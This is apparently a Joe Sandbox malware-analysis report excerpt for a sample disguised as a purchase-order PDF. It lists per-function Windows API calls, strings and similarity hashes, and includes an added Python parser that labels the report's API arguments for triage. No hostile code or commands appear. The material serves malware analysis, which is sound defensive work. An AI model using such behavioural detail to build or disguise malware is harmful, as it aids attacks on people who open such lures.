                                                                                                                                                                                                                                                                                                            • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                                                                                                                                                                                                                            • String ID: (
                                                                                                                                                                                                                                                                                                            • API String ID: 3300687185-3887548279
                                                                                                                                                                                                                                                                                                            • Opcode ID: 695c293b5c08b16f47da31665f3c405faf95951031de7ad37065d401655dd0ad
                                                                                                                                                                                                                                                                                                            • Instruction ID: a007e7ec8c3f390601fcb6226b5fc218b62818acb39bbc9fe8cd9ddeb27b86ed
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 695c293b5c08b16f47da31665f3c405faf95951031de7ad37065d401655dd0ad
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E4514871508345AFD310CF69C884B6BBBE9EF8A310F14881DFA9687390D7B5E844CB66
APIs
• LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
• __swprintf.LIBCMT ref: 0045E4D9
• _printf.LIBCMT ref: 0045E595
• _printf.LIBCMT ref: 0045E5B7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: LoadString_printf$__swprintf_wcslen
• String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
• API String ID: 3590180749-2894483878
• Opcode ID: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
• Instruction ID: 42a5c2f6345f2e10047da6565a111f96cfad8617a22bea28fc44504b1d19b7ce
• Opcode Fuzzy Hash: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
• Instruction Fuzzy Hash: 9F51A171518345ABD324EF91CC41DAF77A8AF84754F04093FF94463292EB78EE488B6A
APIs
• GetWindowLongW.USER32(?,000000F0), ref: 0046F911
• LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 0046F929
• SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
• DeleteObject.GDI32(?), ref: 0046F950
• DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,00000000,00000000,00000000,00002010,?,000000F0), ref: 0046F95E
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9A8
• SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
• DeleteObject.GDI32(?), ref: 0046F9CF
• DestroyIcon.USER32(?,?,000000F7,00000001,00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9DD
• ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
• DestroyIcon.USER32(?), ref: 0046FA4F
• SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
• DeleteObject.GDI32(?), ref: 0046FA68
• DestroyIcon.USER32(?,?,000000F7,00000001,?), ref: 0046FA76
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Icon$Destroy$DeleteMessageObjectSend$ImageLoad$ExtractLongWindow
• String ID:
• API String ID: 3412594756-0
• Opcode ID: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
• Instruction ID: 2b127e2e725f503062080ad48664a75956f0b49bd2ac624c91da1236fc619d99
• Opcode Fuzzy Hash: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
• Instruction Fuzzy Hash: BD41B575344301ABE7209B65ED45B6B7398EB44711F00083EFA85A7381DBB9E809C76A
APIs
  • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
  • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                                                                                                                                                                                                                            • GetDriveTypeW.KERNEL32 ref: 0045DA30
                                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
                                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
                                                                                                                                                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: SendString$_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                                                            • API String ID: 4013263488-4113822522
                                                                                                                                                                                                                                                                                                            • Opcode ID: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                                                                                                                                                                                                                                            • Instruction ID: 78e8968fe3d68f28a61334a0544e46eb3ade7c09d07056eb4a028b8014bab4f9
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86516E71604300ABD710EF55CC85F5EB3E4AF88714F14496EF985AB2D2D7B8E908CB5A
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$_wcsncpy$LocalTime__wcstoi64
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 228034949-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                                                                                                                                                                                                                                                            • Instruction ID: c9113392db11e6d0b84b7dcaf0f9983ae7bcdcfbf3325debe08446cd55f13bc3
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 874194B181435066DA10FF6AC8479DFB3A8EF89314F84495FF945D3162E378E64883AA
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,0046FAD5), ref: 004334F4
                                                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
                                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
                                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00433523
                                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433533
                                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0043353A
                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433541
                                                                                                                                                                                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043354F
                                                                                                                                                                                                                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
                                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0043357B
                                                                                                                                                                                                                                                                                                            • GetObjectW.GDI32(?,00000018,?), ref: 004335A6
                                                                                                                                                                                                                                                                                                            • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004335DB
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00433603
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
• API String ID: 3969911579-0
• Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
• Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
• Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
• Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA
APIs
• GetParent.USER32 ref: 00445A8D
• GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
• __wcsicoll.LIBCMT ref: 00445AC4
• __wcsicoll.LIBCMT ref: 00445AE0
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: __wcsicoll$ClassMessageNameParentSend
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 3125838495-3381328864
• Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
• Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
• Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
• Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: CopyVariant$ErrorLast
• String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
• API String ID: 2286883814-4206948668
• Opcode ID: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
• Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
• Opcode Fuzzy Hash: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
• Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA
APIs
  • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
  • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
• GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
• _wcscpy.LIBCMT ref: 00475F18
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: BuffCharDriveLowerType_wcscpy_wcslen
• String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
• API String ID: 3052893215-4176887700
• Opcode ID: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
• Instruction ID: 30c0e749cffa51fc832ec364bb88d57898ea161693411a08ebb212f54f1b1ce2
• Opcode Fuzzy Hash: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
• Instruction Fuzzy Hash: E951E5716047009BC710EF51D981B9BB3D4AB85705F108C2FF948AB382D7B9DE09879B
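The per-function API lists above (the SHELLDLL_DefView/SendMessageW function, the GetDriveTypeW function with its cdrom/fixed/network/ramdisk/removable/unknown strings, and the RegOpenKeyExW/LoadRegTypeLib function that follows) are the raw material for triage, but the report prints every argument as bare hex. What follows is an added example, not Joe Sandbox code and not code from the analysed sample: a small Python parser for the report's "APIs" lines that turns each line into a record and names the constants that can be resolved with certainty from the Windows SDK (WM_COMMAND = 0x0111, HKEY_CLASSES_ROOT = 0x80000000, KEY_READ = 0x00020019, and the FCIDM_SHVIEW_* view-mode command IDs from shlobj_core.h). The sample input is constructed by copying API lines from this page. Reading the WM_COMMAND with wParam 0x702B as a view-mode switch aimed at the SHELLDLL_DefView window is an inference from the strings listed beside it, not a statement the report makes.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed input: API lines copied verbatim from the function blocks on this page.
SAMPLE_API_LINES = """\
• GetParent.USER32 ref: 00445A8D
• GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
• __wcsicoll.LIBCMT ref: 00445AC4
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D
  • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
• GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
• RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00458351
• RegQueryValueExW.ADVAPI32 ref: 00458381
• LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
"""

# One report line: optional "Part of subcall function XXXXXXXX:" prefix, then
# Api.MODULE, an optional "(arg,arg,...)" list, then "ref: XXXXXXXX" (the call site).
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function (?P<subfn>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# Documented Windows values used to name raw hex arguments.
WM_COMMAND = 0x0111
HKEY_NAMES = {0x80000000: "HKEY_CLASSES_ROOT",
              0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE"}
KEY_READ = 0x00020019
# FCIDM_SHVIEW_* command IDs from shlobj_core.h; a WM_COMMAND carrying one of
# these to a SHELLDLL_DefView window switches that folder view's display mode.
SHVIEW_IDS = {0x7029: "FCIDM_SHVIEW_BIGICON", 0x702A: "FCIDM_SHVIEW_SMALLICON",
              0x702B: "FCIDM_SHVIEW_LISTVIEW", 0x702C: "FCIDM_SHVIEW_REPORTVIEW"}


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int                          # address of the call site inside the dump
    args: list                        # int per argument, None where the sandbox printed '?'
    subcall_of: Optional[int] = None  # set when the report attributes the call to an inlined callee
    notes: list = field(default_factory=list)


def parse_args(text: Optional[str]) -> list:
    """'00000000,?,00000100' -> [0, None, 0x100]; unresolved arguments stay None."""
    if not text:
        return []
    return [None if a.strip() == "?" else int(a, 16) for a in text.split(",")]


def annotate(call: ApiCall) -> ApiCall:
    """Attach names for the constants an analyst would otherwise look up by hand."""
    a = call.args
    if call.api == "SendMessageW" and len(a) >= 3 and a[1] == WM_COMMAND:
        call.notes.append("WM_COMMAND")
        if a[2] in SHVIEW_IDS:
            call.notes.append(SHVIEW_IDS[a[2]])
    if call.api == "RegOpenKeyExW" and len(a) >= 4:
        if a[0] in HKEY_NAMES:
            call.notes.append(HKEY_NAMES[a[0]])
        if a[3] == KEY_READ:
            call.notes.append("KEY_READ")
    return call


def parse_api_lines(text: str) -> list:
    """Parse every API line in `text`; headings such as "APIs" or "Strings" are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        calls.append(annotate(ApiCall(
            api=m["api"], module=m["mod"], ref=int(m["ref"], 16),
            args=parse_args(m["args"]),
            subcall_of=int(m["subfn"], 16) if m["subfn"] else None)))
    return calls


def imports_by_module(calls: list) -> dict:
    """Group API names per DLL/runtime, in report order, for a quick capability summary."""
    out: dict = {}
    for c in calls:
        out.setdefault(c.module, []).append(c.api)
    return out


if __name__ == "__main__":
    for c in parse_api_lines(SAMPLE_API_LINES):
        print(f"{c.ref:08X} {c.module}!{c.api} {c.args} {' '.join(c.notes)}")
```

The `?` placeholders are values the sandbox could not recover at the call site, so they are kept as `None` rather than guessed; anything the parser cannot name stays as the raw integer. The FCIDM_SHVIEW_* names are SDK constants, not a report finding, so treat a hit on one of them as a lead to confirm in the disassembly rather than as a conclusion.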
APIs
• StringFromIID.OLE32(?,?,00000003,?,?,00000000), ref: 004582E5
  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• CoTaskMemFree.OLE32(?,00000000), ref: 00458335
• RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00458351
• RegQueryValueExW.ADVAPI32 ref: 00458381
• CLSIDFromString.OLE32(00000000,?), ref: 004583AF
• RegQueryValueExW.ADVAPI32 ref: 004583E8
• LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
  • Part of subcall function 00413F97: __wtof_l.LIBCMT ref: 00413FA1
• RegCloseKey.ADVAPI32(?), ref: 004584BA
Strings
Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: FromQueryStringValue_wcslen$CloseFreeLoadOpenTaskType__wtof_l_wcscpy
                                                                                                                                                                                                                                                                                                            • String ID: Version$\TypeLib$interface\
                                                                                                                                                                                                                                                                                                            • API String ID: 656856066-939221531
                                                                                                                                                                                                                                                                                                            • Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                                                                                                                                                                                                                                            • Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
                                                                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 0045E6EE
                                                                                                                                                                                                                                                                                                            • _printf.LIBCMT ref: 0045E7A9
                                                                                                                                                                                                                                                                                                            • _printf.LIBCMT ref: 0045E7D2
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
